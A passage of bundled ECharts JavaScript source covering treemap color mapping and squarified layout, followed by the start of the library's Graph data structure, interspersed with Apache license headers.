interval[1])\n            ) {\n                return i;\n            }\n            findClosestWhenOutside && updatePossible(interval[0], i);\n            findClosestWhenOutside && updatePossible(interval[1], i);\n        }\n    }\n\n    if (findClosestWhenOutside) {\n        return value === Infinity\n            ? pieceList.length - 1\n            : value === -Infinity\n            ? 0\n            : possibleI;\n    }\n\n    function updatePossible(val, index) {\n        var newAbs = Math.abs(val - value);\n        if (newAbs < abs) {\n            abs = newAbs;\n            possibleI = index;\n        }\n    }\n\n};\n\nfunction littleThan(close, a, b) {\n    return close ? a <= b : a < b;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar isArray$2 = isArray;\n\nvar ITEM_STYLE_NORMAL = 'itemStyle';\n\nvar treemapVisual = {\n    seriesType: 'treemap',\n    reset: function (seriesModel, ecModel, api, payload) {\n        var tree = seriesModel.getData().tree;\n        var root = tree.root;\n        var seriesItemStyleModel = seriesModel.getModel(ITEM_STYLE_NORMAL);\n\n        if (root.isRemoved()) {\n            return;\n        }\n\n        var levelItemStyles = map(tree.levelModels, function (levelModel) {\n            return levelModel ? levelModel.get(ITEM_STYLE_NORMAL) : null;\n        });\n\n        travelTree(\n            root, // Visual should calculate from tree root but not view root.\n            {},\n            levelItemStyles,\n            seriesItemStyleModel,\n            seriesModel.getViewRoot().getAncestors(),\n            seriesModel\n        );\n    }\n};\n\nfunction travelTree(\n    node, designatedVisual, levelItemStyles, seriesItemStyleModel,\n    viewRootAncestors, seriesModel\n) {\n    var nodeModel = node.getModel();\n    var nodeLayout = node.getLayout();\n\n    // Optimize\n    if (!nodeLayout || nodeLayout.invisible || !nodeLayout.isInView) {\n        return;\n    }\n\n    var nodeItemStyleModel = node.getModel(ITEM_STYLE_NORMAL);\n    var levelItemStyle = levelItemStyles[node.depth];\n    var visuals = buildVisuals(\n        nodeItemStyleModel, designatedVisual, levelItemStyle, seriesItemStyleModel\n    );\n\n    // calculate border color\n    var borderColor = nodeItemStyleModel.get('borderColor');\n    var borderColorSaturation = nodeItemStyleModel.get('borderColorSaturation');\n    var thisNodeColor;\n    if (borderColorSaturation != null) {\n        // For performance, do not always execute 'calculateColor'.\n        thisNodeColor = calculateColor(visuals, node);\n        borderColor = calculateBorderColor(borderColorSaturation, thisNodeColor);\n    }\n    node.setVisual('borderColor', borderColor);\n\n    var viewChildren = node.viewChildren;\n    if (!viewChildren || !viewChildren.length) {\n        thisNodeColor = calculateColor(visuals, node);\n        // Apply visual to this node.\n        node.setVisual('color', thisNodeColor);\n    }\n    else {\n        var mapping = buildVisualMapping(\n            node, nodeModel, nodeLayout, nodeItemStyleModel, visuals, viewChildren\n        );\n\n        // Designate visual to children.\n        each$1(viewChildren, function (child, index) {\n            // If higher than viewRoot, only ancestors of viewRoot is needed to visit.\n            if (child.depth >= viewRootAncestors.length\n                || child === viewRootAncestors[child.depth]\n            ) {\n                var childVisual = mapVisual$1(\n                    nodeModel, visuals, child, index, mapping, seriesModel\n                );\n                travelTree(\n                    child, childVisual, levelItemStyles, seriesItemStyleModel,\n                    viewRootAncestors, seriesModel\n                );\n            }\n        });\n    }\n}\n\nfunction buildVisuals(\n    nodeItemStyleModel, designatedVisual, levelItemStyle, seriesItemStyleModel\n) {\n    var visuals = extend({}, designatedVisual);\n\n    each$1(['color', 'colorAlpha', 'colorSaturation'], function (visualName) {\n        // Priority: thisNode > thisLevel > parentNodeDesignated > seriesModel\n        var val = nodeItemStyleModel.get(visualName, true); // Ignore parent\n        val == null && levelItemStyle && (val = levelItemStyle[visualName]);\n        val == null && (val = designatedVisual[visualName]);\n        val == null && (val = seriesItemStyleModel.get(visualName));\n\n        val != null && (visuals[visualName] = val);\n    });\n\n    return visuals;\n}\n\nfunction calculateColor(visuals) {\n    var color = getValueVisualDefine(visuals, 'color');\n\n    if (color) {\n        var colorAlpha = getValueVisualDefine(visuals, 'colorAlpha');\n        var colorSaturation = getValueVisualDefine(visuals, 'colorSaturation');\n        if (colorSaturation) {\n            color = modifyHSL(color, null, null, colorSaturation);\n        }\n        if (colorAlpha) {\n            color = modifyAlpha(color, colorAlpha);\n        }\n\n        return color;\n    }\n}\n\nfunction calculateBorderColor(borderColorSaturation, thisNodeColor) {\n    return thisNodeColor != null\n            ? modifyHSL(thisNodeColor, null, null, borderColorSaturation)\n            : null;\n}\n\nfunction getValueVisualDefine(visuals, name) {\n    var value = visuals[name];\n    if (value != null && value !== 'none') {\n        return value;\n    }\n}\n\nfunction buildVisualMapping(\n    node, nodeModel, nodeLayout, nodeItemStyleModel, visuals, viewChildren\n) {\n    if (!viewChildren || !viewChildren.length) {\n        return;\n    }\n\n    var rangeVisual = getRangeVisual(nodeModel, 'color')\n        || (\n            visuals.color != null\n            && visuals.color !== 'none'\n            && (\n                getRangeVisual(nodeModel, 'colorAlpha')\n                || getRangeVisual(nodeModel, 'colorSaturation')\n            )\n        );\n\n    if (!rangeVisual) {\n        return;\n    }\n\n    var visualMin = nodeModel.get('visualMin');\n    var visualMax = nodeModel.get('visualMax');\n    var dataExtent = nodeLayout.dataExtent.slice();\n    visualMin != null && visualMin < dataExtent[0] && (dataExtent[0] = visualMin);\n    visualMax != null && visualMax > dataExtent[1] && (dataExtent[1] = visualMax);\n\n    var colorMappingBy = nodeModel.get('colorMappingBy');\n    var opt = {\n        type: rangeVisual.name,\n        dataExtent: dataExtent,\n        visual: rangeVisual.range\n    };\n    if (opt.type === 'color'\n        && (colorMappingBy === 'index' || colorMappingBy === 'id')\n    ) {\n        opt.mappingMethod = 'category';\n        opt.loop = true;\n        // categories is ordinal, so do not set opt.categories.\n    }\n    else {\n        opt.mappingMethod = 'linear';\n    }\n\n    var mapping = new VisualMapping(opt);\n    mapping.__drColorMappingBy = colorMappingBy;\n\n    return mapping;\n}\n\n// Notice: If we dont have the attribute 'colorRange', but only use\n// attribute 'color' to represent both concepts of 'colorRange' and 'color',\n// (It means 'colorRange' when 'color' is Array, means 'color' when not array),\n// this problem will be encountered:\n// If a level-1 node dont have children, and its siblings has children,\n// and colorRange is set on level-1, then the node can not be colored.\n// So we separate 'colorRange' and 'color' to different attributes.\nfunction getRangeVisual(nodeModel, name) {\n    // 'colorRange', 'colorARange', 'colorSRange'.\n    // If not exsits on this node, fetch from levels and series.\n    var range = nodeModel.get(name);\n    return (isArray$2(range) && range.length) ? {name: name, range: range} : null;\n}\n\nfunction mapVisual$1(nodeModel, visuals, child, index, mapping, seriesModel) {\n    var childVisuals = extend({}, visuals);\n\n    if (mapping) {\n        var mappingType = mapping.type;\n        var colorMappingBy = mappingType === 'color' && mapping.__drColorMappingBy;\n        var value = colorMappingBy === 'index'\n            ? index\n            : colorMappingBy === 'id'\n            ? seriesModel.mapIdToIndex(child.getId())\n            : child.getValue(nodeModel.get('visualDimension'));\n\n        childVisuals[mappingType] = mapping.mapValueToVisual(value);\n    }\n\n    return childVisuals;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/*\n* A third-party license is embeded for some of the code in this file:\n* The treemap layout implementation was originally copied from\n* \"d3.js\" with some modifications made for this project.\n* (See more details in the comment of the method \"squarify\" below.)\n* The use of the source code of this file is also subject to the terms\n* and consitions of the license of \"d3.js\" (BSD-3Clause, see\n* </licenses/LICENSE-d3>).\n*/\n\nvar mathMax$5 = Math.max;\nvar mathMin$5 = Math.min;\nvar retrieveValue = retrieve;\nvar each$10 = each$1;\n\nvar PATH_BORDER_WIDTH = ['itemStyle', 'borderWidth'];\nvar PATH_GAP_WIDTH = ['itemStyle', 'gapWidth'];\nvar PATH_UPPER_LABEL_SHOW = ['upperLabel', 'show'];\nvar PATH_UPPER_LABEL_HEIGHT = ['upperLabel', 'height'];\n\n/**\n * @public\n */\nvar treemapLayout = {\n    seriesType: 'treemap',\n    reset: function (seriesModel, ecModel, api, payload) {\n        // Layout result in each node:\n        // {x, y, width, height, area, borderWidth}\n        var ecWidth = api.getWidth();\n        var ecHeight = api.getHeight();\n        var seriesOption = seriesModel.option;\n\n        var layoutInfo = getLayoutRect(\n            seriesModel.getBoxLayoutParams(),\n            {\n                width: api.getWidth(),\n                height: api.getHeight()\n            }\n        );\n\n        var size = seriesOption.size || []; // Compatible with ec2.\n        var containerWidth = parsePercent$1(\n            retrieveValue(layoutInfo.width, size[0]),\n            ecWidth\n        );\n        var containerHeight = parsePercent$1(\n            retrieveValue(layoutInfo.height, size[1]),\n            ecHeight\n        );\n\n        // Fetch payload info.\n        var payloadType = payload && payload.type;\n        var types = ['treemapZoomToNode', 'treemapRootToNode'];\n        var targetInfo = retrieveTargetInfo(payload, types, seriesModel);\n        var rootRect = (payloadType === 'treemapRender' || payloadType === 'treemapMove')\n            ? payload.rootRect : null;\n        var viewRoot = seriesModel.getViewRoot();\n        var viewAbovePath = getPathToRoot(viewRoot);\n\n        if (payloadType !== 'treemapMove') {\n            var rootSize = payloadType === 'treemapZoomToNode'\n                ? estimateRootSize(\n                    seriesModel, targetInfo, viewRoot, containerWidth, containerHeight\n                )\n                : rootRect\n                ? [rootRect.width, rootRect.height]\n                : [containerWidth, containerHeight];\n\n            var sort = seriesOption.sort;\n            if (sort && sort !== 'asc' && sort !== 'desc') {\n                sort = 'desc';\n            }\n            var options = {\n                squareRatio: seriesOption.squareRatio,\n                sort: sort,\n                leafDepth: seriesOption.leafDepth\n            };\n\n            // layout should be cleared because using updateView but not update.\n            viewRoot.hostTree.clearLayouts();\n\n            // TODO\n            // optimize: if out of view clip, do not layout.\n            // But take care that if do not render node out of view clip,\n            // how to calculate start po\n\n            var viewRootLayout = {\n                x: 0, y: 0,\n                width: rootSize[0], height: rootSize[1],\n                area: rootSize[0] * rootSize[1]\n            };\n            viewRoot.setLayout(viewRootLayout);\n\n            squarify(viewRoot, options, false, 0);\n            // Supplement layout.\n            var viewRootLayout = viewRoot.getLayout();\n            each$10(viewAbovePath, function (node, index) {\n                var childValue = (viewAbovePath[index + 1] || viewRoot).getValue();\n                node.setLayout(extend(\n                    {dataExtent: [childValue, childValue], borderWidth: 0, upperHeight: 0},\n                    viewRootLayout\n                ));\n            });\n        }\n\n        var treeRoot = seriesModel.getData().tree.root;\n\n        treeRoot.setLayout(\n            calculateRootPosition(layoutInfo, rootRect, targetInfo),\n            true\n        );\n\n        seriesModel.setLayoutInfo(layoutInfo);\n\n        // FIXME\n        // 现在没有clip功能，暂时取ec高宽。\n        prunning(\n            treeRoot,\n            // Transform to base element coordinate system.\n            new BoundingRect(-layoutInfo.x, -layoutInfo.y, ecWidth, ecHeight),\n            viewAbovePath,\n            viewRoot,\n            0\n        );\n    }\n};\n\n/**\n * Layout treemap with squarify algorithm.\n * The original presentation of this algorithm\n * was made by Mark Bruls, Kees Huizing, and Jarke J. van Wijk\n * <https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf>.\n * The implementation of this algorithm was originally copied from \"d3.js\"\n * <https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.js>\n * with some modifications made for this program.\n * See the license statement at the head of this file.\n *\n * @protected\n * @param {module:echarts/data/Tree~TreeNode} node\n * @param {Object} options\n * @param {string} options.sort 'asc' or 'desc'\n * @param {number} options.squareRatio\n * @param {boolean} hideChildren\n * @param {number} depth\n */\nfunction squarify(node, options, hideChildren, depth) {\n    var width;\n    var height;\n\n    if (node.isRemoved()) {\n        return;\n    }\n\n    var thisLayout = node.getLayout();\n    width = thisLayout.width;\n    height = thisLayout.height;\n\n    // Considering border and gap\n    var nodeModel = node.getModel();\n    var borderWidth = nodeModel.get(PATH_BORDER_WIDTH);\n    var halfGapWidth = nodeModel.get(PATH_GAP_WIDTH) / 2;\n    var upperLabelHeight = getUpperLabelHeight(nodeModel);\n    var upperHeight = Math.max(borderWidth, upperLabelHeight);\n    var layoutOffset = borderWidth - halfGapWidth;\n    var layoutOffsetUpper = upperHeight - halfGapWidth;\n    var nodeModel = node.getModel();\n\n    node.setLayout({\n        borderWidth: borderWidth,\n        upperHeight: upperHeight,\n        upperLabelHeight: upperLabelHeight\n    }, true);\n\n    width = mathMax$5(width - 2 * layoutOffset, 0);\n    height = mathMax$5(height - layoutOffset - layoutOffsetUpper, 0);\n\n    var totalArea = width * height;\n    var viewChildren = initChildren(\n        node, nodeModel, totalArea, options, hideChildren, depth\n    );\n\n    if (!viewChildren.length) {\n        return;\n    }\n\n    var rect = {x: layoutOffset, y: layoutOffsetUpper, width: width, height: height};\n    var rowFixedLength = mathMin$5(width, height);\n    var best = Infinity; // the best row score so far\n    var row = [];\n    row.area = 0;\n\n    for (var i = 0, len = viewChildren.length; i < len;) {\n        var child = viewChildren[i];\n\n        row.push(child);\n        row.area += child.getLayout().area;\n        var score = worst(row, rowFixedLength, options.squareRatio);\n\n        // continue with this orientation\n        if (score <= best) {\n            i++;\n            best = score;\n        }\n        // abort, and try a different orientation\n        else {\n            row.area -= row.pop().getLayout().area;\n            position(row, rowFixedLength, rect, halfGapWidth, false);\n            rowFixedLength = mathMin$5(rect.width, rect.height);\n            row.length = row.area = 0;\n            best = Infinity;\n        }\n    }\n\n    if (row.length) {\n        position(row, rowFixedLength, rect, halfGapWidth, true);\n    }\n\n    if (!hideChildren) {\n        var childrenVisibleMin = nodeModel.get('childrenVisibleMin');\n        if (childrenVisibleMin != null && totalArea < childrenVisibleMin) {\n            hideChildren = true;\n        }\n    }\n\n    for (var i = 0, len = viewChildren.length; i < len; i++) {\n        squarify(viewChildren[i], options, hideChildren, depth + 1);\n    }\n}\n\n/**\n * Set area to each child, and calculate data extent for visual coding.\n */\nfunction initChildren(node, nodeModel, totalArea, options, hideChildren, depth) {\n    var viewChildren = node.children || [];\n    var orderBy = options.sort;\n    orderBy !== 'asc' && orderBy !== 'desc' && (orderBy = null);\n\n    var overLeafDepth = options.leafDepth != null && options.leafDepth <= depth;\n\n    // leafDepth has higher priority.\n    if (hideChildren && !overLeafDepth) {\n        return (node.viewChildren = []);\n    }\n\n    // Sort children, order by desc.\n    viewChildren = filter(viewChildren, function (child) {\n        return !child.isRemoved();\n    });\n\n    sort$1(viewChildren, orderBy);\n\n    var info = statistic(nodeModel, viewChildren, orderBy);\n\n    if (info.sum === 0) {\n        return (node.viewChildren = []);\n    }\n\n    info.sum = filterByThreshold(nodeModel, totalArea, info.sum, orderBy, viewChildren);\n\n    if (info.sum === 0) {\n        return (node.viewChildren = []);\n    }\n\n    // Set area to each child.\n    for (var i = 0, len = viewChildren.length; i < len; i++) {\n        var area = viewChildren[i].getValue() / info.sum * totalArea;\n        // Do not use setLayout({...}, true), because it is needed to clear last layout.\n        viewChildren[i].setLayout({area: area});\n    }\n\n    if (overLeafDepth) {\n        viewChildren.length && node.setLayout({isLeafRoot: true}, true);\n        viewChildren.length = 0;\n    }\n\n    node.viewChildren = viewChildren;\n    node.setLayout({dataExtent: info.dataExtent}, true);\n\n    return viewChildren;\n}\n\n/**\n * Consider 'visibleMin'. Modify viewChildren and get new sum.\n */\nfunction filterByThreshold(nodeModel, totalArea, sum, orderBy, orderedChildren) {\n\n    // visibleMin is not supported yet when no option.sort.\n    if (!orderBy) {\n        return sum;\n    }\n\n    var visibleMin = nodeModel.get('visibleMin');\n    var len = orderedChildren.length;\n    var deletePoint = len;\n\n    // Always travel from little value to big value.\n    for (var i = len - 1; i >= 0; i--) {\n        var value = orderedChildren[\n            orderBy === 'asc' ? len - i - 1 : i\n        ].getValue();\n\n        if (value / sum * totalArea < visibleMin) {\n            deletePoint = i;\n            sum -= value;\n        }\n    }\n\n    orderBy === 'asc'\n        ? orderedChildren.splice(0, len - deletePoint)\n        : orderedChildren.splice(deletePoint, len - deletePoint);\n\n    return sum;\n}\n\n/**\n * Sort\n */\nfunction sort$1(viewChildren, orderBy) {\n    if (orderBy) {\n        viewChildren.sort(function (a, b) {\n            var diff = orderBy === 'asc'\n                ? a.getValue() - b.getValue() : b.getValue() - a.getValue();\n            return diff === 0\n                ? (orderBy === 'asc'\n                    ? a.dataIndex - b.dataIndex : b.dataIndex - a.dataIndex\n                )\n                : diff;\n        });\n    }\n    return viewChildren;\n}\n\n/**\n * Statistic\n */\nfunction statistic(nodeModel, children, orderBy) {\n    // Calculate sum.\n    var sum = 0;\n    for (var i = 0, len = children.length; i < len; i++) {\n        sum += children[i].getValue();\n    }\n\n    // Statistic data extent for latter visual coding.\n    // Notice: data extent should be calculate based on raw children\n    // but not filtered view children, otherwise visual mapping will not\n    // be stable when zoom (where children is filtered by visibleMin).\n\n    var dimension = nodeModel.get('visualDimension');\n    var dataExtent;\n\n    // The same as area dimension.\n    if (!children || !children.length) {\n        dataExtent = [NaN, NaN];\n    }\n    else if (dimension === 'value' && orderBy) {\n        dataExtent = [\n            children[children.length - 1].getValue(),\n            children[0].getValue()\n        ];\n        orderBy === 'asc' && dataExtent.reverse();\n    }\n    // Other dimension.\n    else {\n        var dataExtent = [Infinity, -Infinity];\n        each$10(children, function (child) {\n            var value = child.getValue(dimension);\n            value < dataExtent[0] && (dataExtent[0] = value);\n            value > dataExtent[1] && (dataExtent[1] = value);\n        });\n    }\n\n    return {sum: sum, dataExtent: dataExtent};\n}\n\n/**\n * Computes the score for the specified row,\n * as the worst aspect ratio.\n */\nfunction worst(row, rowFixedLength, ratio) {\n    var areaMax = 0;\n    var areaMin = Infinity;\n\n    for (var i = 0, area, len = row.length; i < len; i++) {\n        area = row[i].getLayout().area;\n        if (area) {\n            area < areaMin && (areaMin = area);\n            area > areaMax && (areaMax = area);\n        }\n    }\n\n    var squareArea = row.area * row.area;\n    var f = rowFixedLength * rowFixedLength * ratio;\n\n    return squareArea\n        ? mathMax$5(\n            (f * areaMax) / squareArea,\n            squareArea / (f * areaMin)\n        )\n        : Infinity;\n}\n\n/**\n * Positions the specified row of nodes. Modifies `rect`.\n */\nfunction position(row, rowFixedLength, rect, halfGapWidth, flush) {\n    // When rowFixedLength === rect.width,\n    // it is horizontal subdivision,\n    // rowFixedLength is the width of the subdivision,\n    // rowOtherLength is the height of the subdivision,\n    // and nodes will be positioned from left to right.\n\n    // wh[idx0WhenH] means: when horizontal,\n    //      wh[idx0WhenH] => wh[0] => 'width'.\n    //      xy[idx1WhenH] => xy[1] => 'y'.\n    var idx0WhenH = rowFixedLength === rect.width ? 0 : 1;\n    var idx1WhenH = 1 - idx0WhenH;\n    var xy = ['x', 'y'];\n    var wh = ['width', 'height'];\n\n    var last = rect[xy[idx0WhenH]];\n    var rowOtherLength = rowFixedLength\n        ? row.area / rowFixedLength : 0;\n\n    if (flush || rowOtherLength > rect[wh[idx1WhenH]]) {\n        rowOtherLength = rect[wh[idx1WhenH]]; // over+underflow\n    }\n    for (var i = 0, rowLen = row.length; i < rowLen; i++) {\n        var node = row[i];\n        var nodeLayout = {};\n        var step = rowOtherLength\n            ? node.getLayout().area / rowOtherLength : 0;\n\n        var wh1 = nodeLayout[wh[idx1WhenH]] = mathMax$5(rowOtherLength - 2 * halfGapWidth, 0);\n\n        // We use Math.max/min to avoid negative width/height when considering gap width.\n        var remain = rect[xy[idx0WhenH]] + rect[wh[idx0WhenH]] - last;\n        var modWH = (i === rowLen - 1 || remain < step) ? remain : step;\n        var wh0 = nodeLayout[wh[idx0WhenH]] = mathMax$5(modWH - 2 * halfGapWidth, 0);\n\n        nodeLayout[xy[idx1WhenH]] = rect[xy[idx1WhenH]] + mathMin$5(halfGapWidth, wh1 / 2);\n        nodeLayout[xy[idx0WhenH]] = last + mathMin$5(halfGapWidth, wh0 / 2);\n\n        last += modWH;\n        node.setLayout(nodeLayout, true);\n    }\n\n    rect[xy[idx1WhenH]] += rowOtherLength;\n    rect[wh[idx1WhenH]] -= rowOtherLength;\n}\n\n// Return [containerWidth, containerHeight] as defualt.\nfunction estimateRootSize(seriesModel, targetInfo, viewRoot, containerWidth, containerHeight) {\n    // If targetInfo.node exists, we zoom to the node,\n    // so estimate whold width and heigth by target node.\n    var currNode = (targetInfo || {}).node;\n    var defaultSize = [containerWidth, containerHeight];\n\n    if (!currNode || currNode === viewRoot) {\n        return defaultSize;\n    }\n\n    var parent;\n    var viewArea = containerWidth * containerHeight;\n    var area = viewArea * seriesModel.option.zoomToNodeRatio;\n\n    while (parent = currNode.parentNode) { // jshint ignore:line\n        var sum = 0;\n        var siblings = parent.children;\n\n        for (var i = 0, len = siblings.length; i < len; i++) {\n            sum += siblings[i].getValue();\n        }\n        var currNodeValue = currNode.getValue();\n        if (currNodeValue === 0) {\n            return defaultSize;\n        }\n        area *= sum / currNodeValue;\n\n        // Considering border, suppose aspect ratio is 1.\n        var parentModel = parent.getModel();\n        var borderWidth = parentModel.get(PATH_BORDER_WIDTH);\n        var upperHeight = Math.max(borderWidth, getUpperLabelHeight(parentModel, borderWidth));\n        area += 4 * borderWidth * borderWidth\n            + (3 * borderWidth + upperHeight) * Math.pow(area, 0.5);\n\n        area > MAX_SAFE_INTEGER && (area = MAX_SAFE_INTEGER);\n\n        currNode = parent;\n    }\n\n    area < viewArea && (area = viewArea);\n    var scale = Math.pow(area / viewArea, 0.5);\n\n    return [containerWidth * scale, containerHeight * scale];\n}\n\n// Root postion base on coord of containerGroup\nfunction calculateRootPosition(layoutInfo, rootRect, targetInfo) {\n    if (rootRect) {\n        return {x: rootRect.x, y: rootRect.y};\n    }\n\n    var defaultPosition = {x: 0, y: 0};\n    if (!targetInfo) {\n        return defaultPosition;\n    }\n\n    // If targetInfo is fetched by 'retrieveTargetInfo',\n    // old tree and new tree are the same tree,\n    // so the node still exists and we can visit it.\n\n    var targetNode = targetInfo.node;\n    var layout = targetNode.getLayout();\n\n    if (!layout) {\n        return defaultPosition;\n    }\n\n    // Transform coord from local to container.\n    var targetCenter = [layout.width / 2, layout.height / 2];\n    var node = targetNode;\n    while (node) {\n        var nodeLayout = node.getLayout();\n        targetCenter[0] += nodeLayout.x;\n        targetCenter[1] += nodeLayout.y;\n        node = node.parentNode;\n    }\n\n    return {\n        x: layoutInfo.width / 2 - targetCenter[0],\n        y: layoutInfo.height / 2 - targetCenter[1]\n    };\n}\n\n// Mark nodes visible for prunning when visual coding and rendering.\n// Prunning depends on layout and root position, so we have to do it after layout.\nfunction prunning(node, clipRect, viewAbovePath, viewRoot, depth) {\n    var nodeLayout = node.getLayout();\n    var nodeInViewAbovePath = viewAbovePath[depth];\n    var isAboveViewRoot = nodeInViewAbovePath && nodeInViewAbovePath === node;\n\n    if (\n        (nodeInViewAbovePath && !isAboveViewRoot)\n        || (depth === viewAbovePath.length && node !== viewRoot)\n    ) {\n        return;\n    }\n\n    node.setLayout({\n        // isInView means: viewRoot sub tree + viewAbovePath\n        isInView: true,\n        // invisible only means: outside view clip so that the node can not\n        // see but still layout for animation preparation but not render.\n        invisible: !isAboveViewRoot && !clipRect.intersect(nodeLayout),\n        isAboveViewRoot: isAboveViewRoot\n    }, true);\n\n    // Transform to child coordinate.\n    var childClipRect = new BoundingRect(\n        clipRect.x - nodeLayout.x,\n        clipRect.y - nodeLayout.y,\n        clipRect.width,\n        clipRect.height\n    );\n\n    each$10(node.viewChildren || [], function (child) {\n        prunning(child, childClipRect, viewAbovePath, viewRoot, depth + 1);\n    });\n}\n\nfunction getUpperLabelHeight(model) {\n    return model.get(PATH_UPPER_LABEL_SHOW) ? model.get(PATH_UPPER_LABEL_HEIGHT) : 0;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nregisterVisual(treemapVisual);\nregisterLayout(treemapLayout);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// id may be function name of Object, add a prefix to avoid this problem.\nfunction generateNodeKey(id) {\n    return '_EC_' + id;\n}\n/**\n * @alias module:echarts/data/Graph\n * @constructor\n * @param {boolean} directed\n */\nvar Graph = function (directed) {\n    /**\n     * 是否是有向图\n     * @type {boolean}\n     * @private\n     */\n    this._directed = directed || false;\n\n    /**\n     * @type {Array.<module:echarts/data/Graph.Node>}\n     * @readOnly\n     */\n    this.nodes = [];\n\n    /**\n     * @type {Array.<module:echarts/data/Graph.Edge>}\n     * @readOnly\n     */\n    this.edges = [];\n\n    /**\n     * @type {Object.<string, module:echarts/data/Graph.Node>}\n     * @private\n     */\n    this._nodesMap = {};\n    /**\n     * @type {Object.<string, module:echarts/data/Graph.Edge>}\n     * @private\n     */\n    this._edgesMap = {};\n\n    /**\n     * @type {module:echarts/data/List}\n     * @readOnly\n     */\n    this.data;\n\n    /**\n     * @type {module:echarts/data/List}\n     * @readOnly\n     */\n    this.edgeData;\n};\n\nvar graphProto = Graph.prototype;\n/**\n * @type {string}\n */\ngraphProto.type = 'graph';\n\n/**\n * If is directed graph\n * @return {boolean}\n */\ngraphProto.isDirected = function () {\n    return this._directed;\n};\n\n/**\n * Add a new node\n * @param {string} id\n * @param {number} [dataIndex]\n */\ngraphProto.addNode = function (id, dataIndex) {\n    id = id == null ? ('' + dataIndex) : ('' + id);\n\n    var nodesMap = this._nodesMap;\n\n    if (nodesMap[generateNodeKey(id)]) {\n        if (__DEV__) {\n            console.error('Graph nodes have duplicate name or id');\n        }\n        return;\n    }\n\n    var node = new Node(id, dataIndex);\n    node.hostGraph = this;\n\n    this.nodes.push(node);\n\n    nodesMap[generateNodeKey(id)] = node;\n    return node;\n};\n\n/**\n * Get node by data index\n * @param  {number} dataIndex\n * @return {module:echarts/data/Graph~Node}\n */\ngraphProto.getNodeByIndex = function (dataIndex) {\n    var rawIdx = this.data.getRawIndex(dataIndex);\n    return this.nodes[rawIdx];\n};\n/**\n * Get node by id\n * @param  {string} id\n * @return {module:echarts/data/Graph.Node}\n */\ngraphProto.getNodeById = function (id) {\n    return this._nodesMap[generateNodeKey(id)];\n};\n\n/**\n * Add a new edge\n * @param {number|string|module:echarts/data/Graph.Node} n1\n * @param {number|string|module:echarts/data/Graph.Node} n2\n * @param {number} [dataIndex=-1]\n * @return {module:echarts/data/Graph.Edge}\n */\ngraphProto.addEdge = function (n1, n2, dataIndex) {\n    var nodesMap = this._nodesMap;\n    var edgesMap = this._edgesMap;\n\n    // PNEDING\n    if (typeof n1 === 'number') {\n        n1 = this.nodes[n1];\n    }\n    if (typeof n2 === 'number') {\n        n2 = this.nodes[n2];\n    }\n\n    if (!Node.isInstance(n1)) {\n        n1 = nodesMap[generateNodeKey(n1)];\n    }\n    if (!Node.isInstance(n2)) {\n        n2 = nodesMap[generateNodeKey(n2)];\n    }\n    if (!n1 || !n2) {\n        return;\n    }\n\n    var key = n1.id + '-' + n2.id;\n    // PENDING\n    if (edgesMap[key]) {\n        return;\n    }\n\n    var edge = new Edge(n1, n2, dataIndex);\n    edge.hostGraph = this;\n\n    if (this._directed) {\n        n1.outEdges.push(edge);\n        n2.inEdges.push(edge);\n    }\n    n1.edges.push(edge);\n    if (n1 !== n2) {\n        n2.edges.push(edge);\n    }\n\n    this.edges.push(edge);\n    edgesMap[key] = edge;\n\n    return edge;\n};\n\n/**\n * Get edge by data index\n * @param  {number} dataIndex\n * @return {module:echarts/data/Graph~Node}\n */\ngraphProto.getEdgeByIndex = function (dataIndex) {\n    var rawIdx = this.edgeData.getRawIndex(dataIndex);\n    return this.edges[rawIdx];\n};\n/**\n * Get edge by two linked nodes\n * @param  {module:echarts/data/Graph.Node|string} n1\n * @param  {module:echarts/data/Graph.Node|string} n2\n * @return {module:echarts/data/Graph.Edge}\n */\ngraphProto.getEdge = function (n1, n2) {\n    if (Node.isInstance(n1)) {\n        n1 = n1.id;\n    }\n    if (Node.isInstance(n2)) {\n        n2 = n2.id;\n    }\n\n    var edgesMap = this._edgesMap;\n\n    if (this._directed) {\n        return edgesMap[n1 + '-' + 